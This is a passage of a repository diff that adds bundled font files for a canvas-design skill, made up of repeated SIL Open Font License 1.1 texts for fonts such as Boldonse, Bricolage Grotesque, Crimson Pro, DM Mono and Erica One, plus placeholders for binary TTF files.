"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/BigShoulders-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/BigShoulders-Regular.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/Boldonse-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/Boldonse-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2024 The Boldonse Project Authors (https://github.com/googlefonts/boldonse)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/Boldonse-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Boldonse-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/BricolageGrotesque-Bold.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/BricolageGrotesque-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/BricolageGrotesque-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/BricolageGrotesque-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2022 The Bricolage Grotesque Project Authors (https://github.com/ateliertriay/bricolage)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/BricolageGrotesque-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/BricolageGrotesque-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/CrimsonPro-Bold.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/CrimsonPro-Bold.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/CrimsonPro-Italic.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/CrimsonPro-Italic.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/CrimsonPro-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/CrimsonPro-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2018 The Crimson Pro Project Authors (https://github.com/Fonthausen/CrimsonPro)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/CrimsonPro-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/CrimsonPro-Regular.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/DMMono-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/DMMono-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2020 The DM Mono Project Authors (https://www.github.com/googlefonts/dm-mono)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/DMMono-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/DMMono-Regular.ttf
Normal file
Binary file not shown.
94
skills/canvas-design/canvas-fonts/EricaOne-OFL.txt
Normal file
94
skills/canvas-design/canvas-fonts/EricaOne-OFL.txt
Normal file
@@ -0,0 +1,94 @@
|
|||||||
|
Copyright (c) 2011 by LatinoType Limitada (luciano@latinotype.com),
|
||||||
|
with Reserved Font Names "Erica One"
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/EricaOne-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/EricaOne-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/GeistMono-Bold.ttf
Normal file
BIN
